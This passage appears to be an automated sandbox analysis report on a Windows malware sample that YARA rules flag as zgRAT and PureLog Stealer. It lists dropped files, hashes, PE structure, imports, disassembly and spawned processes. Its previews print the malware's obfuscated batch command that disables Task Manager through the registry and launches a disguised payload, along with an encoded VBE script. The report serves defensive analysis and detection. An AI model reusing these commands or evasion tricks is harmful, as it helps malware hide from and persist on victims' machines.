                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1224
                                                          Entropy (8bit):4.435108676655666
                                                          Encrypted:false
                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                          Malicious:false
                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.931759895805073
                                                          Encrypted:false
                                                          SSDEEP:48:69J7PtcjM7Jt8Bs3FJsdcV4MKe27d32vqBHeOulajfqXSfbNtm:cPlPc+Vx9MV2vk4cjRzNt
                                                          MD5:D2CC4F2CD282AFD18389D0D3FD30C3AC
                                                          SHA1:00C10A30817655479A10CA63E28803DCDBEFEE05
                                                          SHA-256:C2A5FE4847A53D9176354CA1C63D39FA5FDCC50776D552C04BF78BD522BFC3C9
                                                          SHA-512:1678DD11D1317A3F4D6388F2532780D12689870C7ABAC966C586632244F613F3FC797511DC79E8B31D03BA20EE13D1E4CDEAA9E3580FBEE8D60A84DC3AF12A99
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`sg.............................'... ...@....@.. ....................................@.................................<'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with very long lines (469), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):469
                                                          Entropy (8bit):5.855450311037231
                                                          Encrypted:false
                                                          SSDEEP:12:BcZ4a7hvEHa2j3fairsN16AKvCw/euGdgdH+tFqSx0WJF6:BcZ4atvEHDDS4sHK1eLw8Em0MA
                                                          MD5:B471EB0AAD0AD87C653CF5065FA61F4A
                                                          SHA1:694A64A5596A13249C030495A42753EFB084E3FE
                                                          SHA-256:5602474BABBE8E2DAB1AB714CA16F49C864221F9076F5820BC8A98A2E4FCAA82
                                                          SHA-512:021AD460F402D12EF3467A4E52900E25015535DC205402C9147DF1CA59ACDF0E5438AA53760CDB698BE3990A66EC3F4B1E22D93E447FA61D703540133836B64A
                                                          Malicious:false
                                                          Preview:4hUGp3892YtESk5IEX0XfhpwNTKdn44T4rgrhwmLLoVFmqG93KXv8m7X1h3WseV7eaJkDNlRvpM1LkJhMKjdgIURuJ093PcqSYlMgg5qjGATaFLRYVKh52aVG104XlXfMfix87AqP33aIB1o7ikhF4ua7QGopBS7tfG4hYTbUdSC8AMEAL7zAzZSuHzs1WANl6rn56HiPJNllsb6DBndEd63FyKZjlk8dFbCTjJDEYj1mxqBq3ozsgJHAxhHwr9ojOIgRZmd2kZp3FQSHItp6uP66TCgCCRXY5RXpKuQQK7IHdO4gP9n8Try9Lk8XGbzSCR8x3m7YcZvxHzcEH9xCnYFNdYdkv3JtHzEMQHnmCPf36B1VH3PHoxpnLuTeIWmiQCpRuQy9VKAX2LRbgId1oCFUKbAfyJepm7n4Vkl0FQwewRuAd17A3v4N7VHTQSLLqUv5hXG6hmvXQlh2qAC6
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with very long lines (503), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):503
                                                          Entropy (8bit):5.8731118905923845
                                                          Encrypted:false
                                                          SSDEEP:12:FNpMriHkuvrnJpzDzCfWqsBLk88tEpCRCeHxM82mW2X/Kc:F7PPnnzDzKZs9n8tEG9Hh2mvt
                                                          MD5:1B47589743AC0159B3627BF815242A34
                                                          SHA1:318636755B518E54DB01044649B371D049F6D79B
                                                          SHA-256:58DDC2F31160596651EB92E7825589F753C70A2E22468FE15970475E9CCADC96
                                                          SHA-512:41B457046A851E9132724D34F86891003954E61E0FF8EE341BA70E13A5C18AAC77BA8252D31B45491E733B3EEABF784936E34680E13BD369F8833F4629493456
                                                          Malicious:false
                                                          Preview:
                                                          Process:C:\Users\user\Desktop\KzLetzDiM8.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2039296
                                                          Entropy (8bit):7.577687284159168
                                                          Encrypted:false
                                                          SSDEEP:49152:IeWIu4wEKRrqO5Tz2ZqORRlpK6aGAA/3:IvfNEqORbajA/
                                                          MD5:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          SHA1:99302EA1E8E802AC39B9A7E5A1FC63E2C1CBAEFA
                                                          SHA-256:E86BBF4C032BC999352EE883A862A9219607244D571CE220526DB0AE35F8E5F9
                                                          SHA-512:7C04B6243E6248657CB71C9FA0210C6C9D361BE0A23AFAE2EE933090F345826B48A0496522027E1C0EBDD68B666843EB07C74819560080AB9ECDFFA4248D8DF8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\fontdriversavescrt\ComComponentDriverInto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\fontdriversavescrt\ComComponentDriverInto.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.ng............................n4... ...@....@.. ....................................@................................. 4..K....@.. ....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................P4......H........... ...........0...NP...3.......................................0..........(.... ........8........E........*.......9...8....*(.... ....~{...{....:....& ....8....(.... ....8....(.... ....~{...{....:....& ....8........0.......... ........8........E........6..._...........8....r...ps....z*...... ....~{...{....:....& ....8....~....:.... ....~{...{....:....& ....8........~....(J...~....(N... ....?.... ....~{...{....:R...& ....8G...~....(B... .... .... ....s....~....(F....
                                                          Process:C:\Users\user\Desktop\KzLetzDiM8.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):215
                                                          Entropy (8bit):5.264743917421015
                                                          Encrypted:false
                                                          SSDEEP:6:NcStuH1jhRiI36BNPexUTQYAfzGBIIyxg:QVjhR136NPL8tL0yq
                                                          MD5:12341E65B9B68859034CE10B46AED8BF
                                                          SHA1:E1E747F8F805BED100508C20AB3069252FED2C3C
                                                          SHA-256:884DDB071EB119926AE99CF11D81E96C09C25D593701B9C49CBC071445835ED8
                                                          SHA-512:9F99158522F612455CD454D945B9147C7C810071889B6A18C320DD5CC688D471B7589FA948B4B9FD82EC5BB3AF4DD39F672BA1B52728A63B20974DE72E06DD72
                                                          Malicious:false
                                                          Preview:%Ycv%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%ZfvUhsLtn%..%qNWqSpvyixGQlNk%"%SystemDrive%\fontdriversavescrt/ComComponentDriverInto.exe"%VWTILvCL%
                                                          Process:C:\Users\user\Desktop\KzLetzDiM8.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):224
                                                          Entropy (8bit):5.750401741174558
                                                          Encrypted:false
                                                          SSDEEP:6:GPwqK+NkLzWbH1rFnBaORbM5nCIjHx8LnE56Cpl:GWMCzWL1hBaORbQCIjd6Cpl
                                                          MD5:E4A0EBA820478624DC3D0BFB7BD8F01C
                                                          SHA1:A343C39F539E67D7A237AE970E4CC17D31158083
                                                          SHA-256:A1C66C765284A92DB3BA7BECA1B97902BA5C27471D23FC684F03219196B1478A
                                                          SHA-512:B60975C19C3F50CB5BC09C7F36BC0B335634369B526535D9A87C84C0AFA12F07520BE0F87688D19FE4AD34C30BBCB43470899B621EAC551DC15A9BB325031167
                                                          Malicious:false
                                                          Preview:#@~^xwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v 0!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPrYUXdD+sfDb\.Yz6WUY9Dr-.D/m-+kmDD&&2T3kt-|.5mDF}0.Xc4COr~PTS,0CVknIkEAAA==^#~@.
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2039296
                                                          Entropy (8bit):7.577687284159168
                                                          Encrypted:false
                                                          SSDEEP:49152:IeWIu4wEKRrqO5Tz2ZqORRlpK6aGAA/3:IvfNEqORbajA/
                                                          MD5:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          SHA1:99302EA1E8E802AC39B9A7E5A1FC63E2C1CBAEFA
                                                          SHA-256:E86BBF4C032BC999352EE883A862A9219607244D571CE220526DB0AE35F8E5F9
                                                          SHA-512:7C04B6243E6248657CB71C9FA0210C6C9D361BE0A23AFAE2EE933090F345826B48A0496522027E1C0EBDD68B666843EB07C74819560080AB9ECDFFA4248D8DF8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\fontdriversavescrt\WmiPrvSE.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\fontdriversavescrt\WmiPrvSE.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.ng............................n4... ...@....@.. ....................................@................................. 4..K....@.. ....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................P4......H........... ...........0...NP...3.......................................0..........(.... ........8........E........*.......9...8....*(.... ....~{...{....:....& ....8....(.... ....8....(.... ....~{...{....:....& ....8........0.......... ........8........E........6..._...........8....r...ps....z*...... ....~{...{....:....& ....8....~....:.... ....~{...{....:....& ....8........~....(J...~....(N... ....?.... ....~{...{....:R...& ....8G...~....(B... .... .... ....s....~....(F....
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.721736326371302
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FX4ks5XXKvrPUmNvj:Vx993DEUssJXvmx
                                                          MD5:0299EE506C9C18EACEF090C85B561F8A
                                                          SHA1:452D0422D26F1400BA578CEAF55B19D2BB5CD4D6
                                                          SHA-256:25F000BAD8DBB060F683EB21CA65A72FB29896BAAB6AF7CA59BF105723872D32
                                                          SHA-512:44D906636A9BC895A048BF1047D4130302ED514AA5861D0211F2EDF5FCF57197C5AE65A14C57D7378174FF7A83D405A57A2D56A2C389DF237715C614B024D1B5
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 30/12/2024 22:10:27..22:10:27, error: 0x80072746.22:10:32, error: 0x80072746.
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.919073947748398
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:KzLetzDiM8.exe
                                                          File size:1'896'756 bytes
                                                          MD5:a554052564261d9d5c7e0cd92514d3a0
                                                          SHA1:36187b2e29881e34a3fa51dd32b89c6bddcc68c6
                                                          SHA256:06effa75c48b51ef222da511c8550ff450947fd326389fa7d60613c79760d407
                                                          SHA512:2a5c5524bf20b870c7e747beaabd3c5fbd894b3c8878005127fd7b5950be87c69c519b156aad600d771c9c7d2566b4e3b4e65e5a89b4441417839a41e939ad06
                                                          SSDEEP:24576:2TbBv5rUyXVMh3/cVBxJWzAuxM8bxjC8PMUdaOQuvBc2f4N5zsVeXmnntz+xlHU7:IBJ8EHWcgbRCOU1E8sVWSt6x7m1DlPm2
                                                          TLSH:DD952312BAC5D4B3D0A3083616296B21A53D7C602FBACEEF53E4296DD5316C0D7317AB
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                          Icon Hash:1515d4d4442f2d2d
                                                          Entrypoint:0x41f530
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                          Instruction
                                                          call 00007F56D080CE6Bh
                                                          jmp 00007F56D080C77Dh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007F56D07FF5C7h
                                                          mov dword ptr [esi], 004356D0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 004356D8h
                                                          mov dword ptr [ecx], 004356D0h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 004356B8h
                                                          push eax
                                                          call 00007F56D080FC0Fh
                                                          test byte ptr [ebp+08h], 00000001h
                                                          pop ecx
                                                          je 00007F56D080C90Ch
                                                          push 0000000Ch
                                                          push esi
                                                          call 00007F56D080BEC9h
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007F56D07FF542h
                                                          push 0043BEF0h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007F56D080F6C9h
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007F56D080C888h
                                                          push 0043C0F4h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007F56D080F6ACh
                                                          int3
                                                          jmp 00007F56D0811147h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push 00422900h
                                                          push dword ptr fs:[00000000h]
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
Name                                  | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          | 0x3d070         | 0x34         | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          | 0x3d0a4         | 0x50         | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        | 0x64000         | 0xdff8       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY        | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC       | 0x72000         | 0x233c       | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           | 0x3b11c         | 0x54         | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS             | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     | 0x355f8         | 0x40         | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT             | 0x33000         | 0x278        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    | 0x3c5ec         | 0x120        | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED        | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy            | Characteristics
.text  | 0x1000          | 0x31bdc      | 0x31c00  | 2831bb8b11e3209658a53131886cdf98 | False    | 0.5909380888819096 | data      | 6.712962136932442  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000         | 0xaec0       | 0xb000   | 042f11346230ca5aa360727d9908e809 | False    | 0.4579190340909091 | data      | 5.261605615899847  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0x3e000         | 0x24720      | 0x1000   | 9670b581969e508258d8bc903025de5e | False    | 0.451416015625     | data      | 4.387459135575936  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000         | 0x190        | 0x200    | c83554035c63bb446c6208d0c8fa0256 | False    | 0.4453125          | data      | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0x64000         | 0xdff8       | 0xe000   | ba08fbcd0ed7d9e6a268d75148d9914b | False    | 0.6373639787946429 | data      | 6.638661032196024  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000         | 0x233c       | 0x2400   | 40b5e17755fd6fdd34de06e5cdb7f711 | False    | 0.7749565972222222 | data      | 6.623012966548067  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name          | RVA     | Size   | Type                                                                                                    | Language | Country       | ZLIB Complexity
PNG           | 0x64650 | 0xb45  | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced                                               | English  | United States | 1.0027729636048528
PNG           | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced                                              | English  | United States | 0.9363390441839495
RT_ICON       | 0x66748 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors   | English  | United States | 0.47832369942196534
RT_ICON       | 0x66cb0 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors  | English  | United States | 0.5410649819494585
RT_ICON       | 0x67558 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors  | English  | United States | 0.4933368869936034
RT_ICON       | 0x68400 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m                       | English  | United States | 0.5390070921985816
RT_ICON       | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m                       | English  | United States | 0.41393058161350843
RT_ICON       | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m                       | English  | United States | 0.3479253112033195
RT_ICON       | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                             | English  | United States | 0.9809269502193401
RT_DIALOG     | 0x70588 | 0x286  | data                                                                                                    | English  | United States | 0.5092879256965944
RT_DIALOG     | 0x70358 | 0x13a  | data                                                                                                    | English  | United States | 0.60828025477707
RT_DIALOG     | 0x70498 | 0xec   | data                                                                                                    | English  | United States | 0.6991525423728814
RT_DIALOG     | 0x70228 | 0x12e  | data                                                                                                    | English  | United States | 0.5927152317880795
RT_DIALOG     | 0x6fef0 | 0x338  | data                                                                                                    | English  | United States | 0.45145631067961167
RT_DIALOG     | 0x6fc98 | 0x252  | data                                                                                                    | English  | United States | 0.5757575757575758
RT_STRING     | 0x70f68 | 0x1e2  | data                                                                                                    | English  | United States | 0.3900414937759336
RT_STRING     | 0x71150 | 0x1cc  | data                                                                                                    | English  | United States | 0.4282608695652174
RT_STRING     | 0x71320 | 0x1b8  | data                                                                                                    | English  | United States | 0.45681818181818185
RT_STRING     | 0x714d8 | 0x146  | data                                                                                                    | English  | United States | 0.5153374233128835
RT_STRING     | 0x71620 | 0x46c  | data                                                                                                    | English  | United States | 0.3454063604240283
RT_STRING     | 0x71a90 | 0x166  | data                                                                                                    | English  | United States | 0.49162011173184356
RT_STRING     | 0x71bf8 | 0x152  | data                                                                                                    | English  | United States | 0.5059171597633136
RT_STRING     | 0x71d50 | 0x10a  | data                                                                                                    | English  | United States | 0.49624060150375937
RT_STRING     | 0x71e60 | 0xbc   | data                                                                                                    | English  | United States | 0.6329787234042553
RT_STRING     | 0x71f20 | 0xd6   | data                                                                                                    | English  | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68   | data                                                                                                    | English  | United States | 0.7019230769230769
RT_MANIFEST   | 0x70810 | 0x753  | XML 1.0 document, ASCII text, with CRLF line terminators                                                | English  | United States | 0.3957333333333333
DLL          | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll  | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English                        | United States
                                                          No network behavior found

                                                          Target ID:0
                                                          Start time:20:21:53
                                                          Start date:30/12/2024
                                                          Path:C:\Users\user\Desktop\KzLetzDiM8.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\KzLetzDiM8.exe"
                                                          Imagebase:0x1e0000
                                                          File size:1'896'756 bytes
                                                          MD5 hash:A554052564261D9D5C7E0CD92514D3A0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1655967326.00000000069EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:20:21:53
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe"
                                                          Imagebase:0xbf0000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:20:22:22
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" "
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:20:22:22
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
